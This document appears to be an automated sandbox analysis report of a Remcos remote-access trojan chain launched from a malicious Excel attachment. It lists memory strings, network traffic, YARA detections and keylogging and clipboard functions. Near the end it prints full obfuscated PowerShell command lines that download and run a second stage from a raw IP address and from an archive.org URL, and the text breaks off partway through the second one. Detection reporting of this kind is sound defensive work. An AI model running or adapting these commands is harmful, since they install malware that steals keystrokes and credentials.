                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C204000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001A.00000002.512058781.0000000000459000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: RegAsm.exe, 0000001A.00000002.511865097.00000000003FC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/uK
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                Source: RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: RegAsm.exe, 00000015.00000002.515513667.0000000000203000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.netX
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: powershell.exe, 0000000E.00000002.505047293.00000000025D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 0000000C.00000002.524628832.00000000027A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_
                Source: powershell.exe, 0000000E.00000002.505011159.0000000001E54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001AB7A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C282000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.504984898.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000007.00000002.495659200.00000000122A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C21C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.496333686.000000001C1FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C223000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521079738.000000001ABB1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.521661527.000000001C237000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: RegAsm.exe, 00000015.00000002.516533065.0000000002378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                Source: RegAsm.exe, RegAsm.exe, 0000001A.00000002.511886062.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv1E0C.tmp.21.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476695899.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zeep.ly/
                Source: mshta.exe, 00000004.00000003.474232984.000000000370D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.000000000370F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zeep.ly/c
                Source: mshta.exe, 00000004.00000002.476023425.000000000048A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474232984.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.475368209.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474811501.0000000003752000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.474574663.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.476741693.0000000003752000.00000004.00000020.00020000.00000000.sdmp, RFQ_0230909024SEPT.xla.xlsx, B3930000.0.drString found in binary or memory: https://zeep.ly/yDfvh
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000017_2_0040A2F3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,21_2_0040987A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,21_2_004098E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,23_2_00406DFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00406E9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,26_2_004068B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,26_2_004072B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A41B
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CA73 SystemParametersInfoW,17_2_0041CA73

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Excel sheet contains many unusual embedded objects
                Source: RFQ_0230909024SEPT.xla.xlsxOLE: Microsoft Excel 2007+
                Source: B3930000.0.drOLE: Microsoft Excel 2007+
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetcateudpationprocess[1].htaJump to behavior
                Very long command line found
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9302
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9302Jump to behavior
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
